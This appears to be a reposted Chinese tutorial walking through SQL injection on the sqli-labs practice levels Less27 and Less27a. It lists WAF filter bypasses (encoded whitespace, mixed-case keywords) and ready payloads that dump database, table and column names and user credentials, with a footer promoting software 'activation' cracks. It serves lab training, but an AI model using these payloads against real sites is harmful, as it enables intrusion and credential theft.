sqlmap布尔盲注_sql注入手工检测方法

sqlmap布尔盲注_sql注入手工检测方法

目录

推荐:

一、(手工)SQL注入基本步骤:

二、Less27(GET-Error based – All your UNION & SELECT belong to us-string single quote)

2.1、简介:(过滤-报错回显-单引号)

2.2、第一步:注入点测试

 2.3、第二步:分析过滤

2.4、第三步:判断字段数

2.5、第四步:暴库

2.6、第五步:爆表名

2.7、第六步:爆字段

2.8、第七步:爆数据

三、Less27a(GET-Blind based – All your UNION & SELECT belong to us Double quote )

3.1、简介:(过滤-布尔盲注-双引号)

3.2、特点:

3.3、利用过程:


推荐:

【SQL注入-无回显】布尔盲注:原理、函数、利用过程sqlmap布尔盲注_sql注入手工检测方法https://blog.csdn.net/_/article/details/?ops_request_misc=%257B%2522request%255Fid%2522%253A%%2522%252C%2522scm%2522%253A%3..pc%255Fblog.%2522%257D&request_id=56&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1–null-null.185%5Ev2%5Econtrol&utm_term=%E5%B8%83%E5%B0%94&spm=1018.2226.3001.4450

【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/_/article/details/?spm=1001.2014.3001.5501https://blog.csdn.net/_/article/details/?spm=1001.2014.3001.5501icon-default.png?t=M666https://blog.csdn.net/_/article/details/?spm=1001.2014.3001.5501

【WAF绕过】SQL注入、文件上传、XSShttps://blog.csdn.net/_/article/details/?ops_request_misc=%257B%2522request%255Fid%2522%253A%%2522%252C%2522scm%2522%253A%3..pc%255Fblog.%2522%257D&request_id=82&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1–null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/_/article/details/?ops_request_misc=%257B%2522request%255Fid%2522%253A%%2522%252C%2522scm%2522%253A%3..pc%255Fblog.%2522%257D&request_id=82&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1–null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450icon-default.png?t=M666https://blog.csdn.net/_/article/details/?ops_request_misc=%257B%2522request%255Fid%2522%253A%%2522%252C%2522scm%2522%253A%3..pc%255Fblog.%2522%257D&request_id=82&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1–null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450



一、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:爆数据



二、Less27(GET-Error based – All your UNION & SELECT belong to us-string single quote)

2.1、简介:(过滤-报错回显-单引号)

请求方法:GET

方法:过滤替换: /* , – , # , 空格 , /、union、select、UNION、SELECT、Union、Select+报错回显

2.2、第一步:注入点测试

输入?id=1

 后面加上单引号发现报错了

说明是单引号闭合,即是字符型注入

且可利用报错回显

sqlmap布尔盲注_sql注入手工检测方法

 2.3、第二步:分析过滤

方法一:

考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)

或者全部替换(如果报错,不知道哪里被过滤了)


方法二:

获取源码进行白盒审计(最优)


方法三:

eg:输入id=union(重要的都输进去)

看输入回显过滤语句的情况

sqlmap布尔盲注_sql注入手工检测方法


最后可以知道被过滤的字符有

 /* , – , # , 空格 , /,/s

union、select、UNION、SELECT、Union、Select


替代空格:

%09  TAB 键(水平)

%0a  新建一行

%0c  新的一页

%0d  return 功能

%0b  TAB 键(垂直)

%a0  空格

空格换成 ||


注释被过滤掉了,就可以使用拼接进语句,将2侧进行闭合


union和select可以使用大小写混淆绕过,或者双写

2.4、第三步:判断字段数

2.5、第四步:暴库

?id=1’%26%26extractvalue(1, concat(0x7e, database()))%26%26’1

sqlmap布尔盲注_sql注入手工检测方法

 或者

?id=0’unIon%0BSelEcT%0B1,database(),3||’1

sqlmap布尔盲注_sql注入手工检测方法

2.6、第五步:爆表名

?id=0’%0AunIon%0ASeLeCt%0A1,(SeLeCt%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=’security’),3||’1

sqlmap布尔盲注_sql注入手工检测方法

 或者

?id=0’||extractvalue(1,concat(0x7e,(sEleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)=database())))||’

sqlmap布尔盲注_sql注入手工检测方法

2.7、第六步:爆字段

?id=0’%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema=’security’%0bAnd%0btable_name=’users’%0b%26%26%0b’1’=’1

sqlmap布尔盲注_sql注入手工检测方法

或者

?id=1’||extractvalue(1,concat(0x7e,(sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema)=(database())and(table_name)=’users’)))||’

sqlmap布尔盲注_sql注入手工检测方法

2.8、第七步:爆数据

?id=1’||extractvalue(1,concat(0x7e,(sEleCt(substr((group_concat(username,password)),1,32))from(users))))||’

sqlmap布尔盲注_sql注入手工检测方法

或者

 ?id=0’/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/1,(SeLeCt/*%0a*/group_concat(concat_ws(‘$’,id,username,password))/*%0a*/from/*%0a*/users),3/*%0a*/||/*%0a*/’1’=’1

sqlmap布尔盲注_sql注入手工检测方法



三、Less27a(GET-Blind based – All your UNION & SELECT belong to us Double quote )

3.1、简介:(过滤-布尔盲注-双引号)

请求方法:GET

方法:过滤替换: /* , – , # , 空格 , /、union、select、UNION、SELECT、Union、Select+布尔盲注

3.2、特点:

双引号字符型注入,可以使用union联合注入

无错误回显(即不能报错注入updatexml函数等)

正确和错误页面不同,可以进行布尔盲注,因为他有无错误回显

也可延时盲注

3.3、利用过程:

基本上和Less26使用联合查询一样

进行布尔盲注(判断)

?id=0″unIon%0BSelEcT%0B1,database(),”3

sqlmap布尔盲注_sql注入手工检测方法

…… 

2024最新激活全家桶教程,稳定运行到2099年,请移步至置顶文章:https://sigusoft.com/99576.html

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。 文章由激活谷谷主-小谷整理,转载请注明出处:https://sigusoft.com/147580.html

(0)
上一篇 2024年 6月 30日 下午12:53
下一篇 2024年 6月 30日

相关推荐

关注微信